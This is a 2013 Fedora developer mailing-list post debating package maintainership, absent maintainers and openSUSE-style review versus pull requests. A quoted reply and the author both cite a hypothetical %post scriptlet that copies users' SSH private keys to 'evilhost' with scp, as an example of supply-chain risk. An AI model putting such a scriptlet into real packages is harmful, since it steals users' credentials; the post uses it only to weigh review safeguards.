Question about "what to do if mantainer is absent"

Michael Catanzaro mike.catanzaro at
Wed May 15 01:03:41 UTC 2013

On Tue, 2013-05-14 at 14:20 -0600, Kevin Fenzi wrote:
> On Tue, 14 May 2013 21:04:59 +0100
> "Richard W.M. Jones" <rjones at> wrote:
> > I suspect the main one is someone putting:
> > 
> > %post
> > scp /home/*/.ssh/id_rsa evilhost:
> > 
> > into a commonly used package, or something equivalent but more subtle
> > than that.
> > 
> > Basically you're giving root access to everyone with a FAS packager
> > account (not that the current situation is that much better).
> well, no, thats not what I was talking about, that is a completely
> different issue. ;) 
> I was referring to the fact that if we had a collection of around 14,000
> packages and a pool of around 1400 maintainers if everyone just
> wandered around working on whatever they liked you would get X people
> fixing the same bug and duplicating effort, X people talking to
> upstream and telling them different things, X people figuring out a
> problem and waiting for something to happen for a real solution and
> someone else wandering in and fixing it in a poor/hacky way, X people
> telling users one decision and Y people telling them another, etc. 
> If you have a small set of interested maintainers they can communicate
> between the group and divide work and come to consensus. Things don't
> scale to do that over the entire collection on every decision. 
Well the open model has already been tried and proven in openSUSE, and
they're still using it because it actually works really well.  There
aren't usually any issues regarding overlap of work, though admittedly
that community is a smaller than Fedora's. It's hard to get away with
scp /home/*/.ssh/id_rsa evilhost because every change is always reviewed
by a small group of maintainers responsible for a collection of

I certainly think Fedora could benefit a lot from at least a slightly
more collaborative approach.  For example, in openSUSE when there is a
problem with an really easy fix, I make a bugzilla report, fix it, my
request gets accepted (or not) a few days later, and problem solved.  In
Fedora when there is a problem with an easy fix, I make a bugzilla
report, it gets assigned to someone awesome enough to have 200-800 other
open bugs to deal with, and nothing happens for two months until a
provenpackager stumbles upon the bug.

We already use git, so the simple solution with minimal change to the
status quo is to leave the maintainership model as-is and add pull
requests.  (That said I'm not advocating this as I have zero Fedora
packaging experience; I'm just trying to get this conversation off the
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 490 bytes
Desc: This is a digitally signed message part
URL: <>

More information about the devel mailing list